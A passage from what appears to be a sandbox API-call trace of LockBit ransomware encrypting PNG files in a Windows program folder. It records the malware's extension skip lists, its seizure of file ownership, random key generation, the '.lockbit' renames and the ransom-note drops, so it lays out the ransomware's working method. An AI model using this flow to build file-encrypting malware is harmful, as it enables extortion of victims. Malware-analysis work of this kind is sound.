lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0082.400] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0082.400] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.401] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.401] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.402] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.402] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.402] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.402] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.402] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.402] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.402] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.402] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.403] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.403] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.403] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.403] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.403] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.403] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.403] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.403] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.403] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.403] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0082.403] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0082.403] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0082.403] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0082.403] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0082.403] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0082.403] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0082.403] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\") returned="" [0082.403] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png") returned=".png" [0082.404] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.404] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.404] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.404] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.405] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.405] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.405] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.405] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.405] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.405] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.405] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.405] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.405] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.405] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png.lockbit") returned 92 [0082.405] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.406] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.406] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.406] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.407] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.407] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.407] RtlFreeAnsiString (AnsiString="\\") [0082.407] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0082.408] malloc (_Size=0x200) returned 0x77d800 [0082.408] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.408] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.408] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.408] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.409] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.409] CloseHandle (hObject=0x3ac) returned 1 [0082.409] free (_Block=0x77d800) [0082.409] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0082.409] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.409] malloc (_Size=0x40068) returned 0x1ff1e60 [0082.409] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5088) returned 1 [0082.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.410] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0082.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0082.411] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.416] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.416] malloc (_Size=0xce) returned 0x77d800 [0082.416] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xce, FileInformationClass=0xa) returned 0x0 [0082.417] free (_Block=0x77d800) [0082.417] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 1 [0082.417] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt") returned 72 [0082.417] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.417] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd80375, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd80375, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0082.417] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0082.417] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0082.417] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0082.417] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.417] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.417] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.417] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.417] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.417] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.419] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.419] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.419] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.420] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.420] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.420] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.420] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.420] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.420] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.420] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.420] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.421] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.421] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.421] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.421] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.421] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.421] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.422] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.422] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.422] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.422] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.422] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.422] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.422] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0082.422] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0082.422] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0082.422] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0082.422] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0082.422] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0082.422] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0082.422] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\") returned="" [0082.422] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0082.422] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.422] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.422] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.422] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.422] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.422] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.422] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.422] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.423] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.423] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.423] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.423] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.423] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.423] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.423] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.423] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.423] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 98 [0082.423] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.424] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.424] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.424] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.424] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.425] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.425] RtlFreeAnsiString (AnsiString="\\") [0082.425] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0082.425] malloc (_Size=0x200) returned 0x77d800 [0082.425] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.425] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.425] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.425] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.426] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.426] CloseHandle (hObject=0x3b8) returned 1 [0082.426] free (_Block=0x77d800) [0082.426] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0082.426] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.426] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.426] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3130) returned 1 [0082.426] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.428] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.452] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.452] malloc (_Size=0xda) returned 0x1ff1e60 [0082.452] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xda, FileInformationClass=0xa) returned 0xc0000008 [0082.452] free (_Block=0x1ff1e60) [0082.452] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 1 [0082.452] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt") returned 72 [0082.452] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.453] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fda64d2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fda64d2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0082.453] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0082.453] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0082.453] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0082.453] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.453] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".mod", 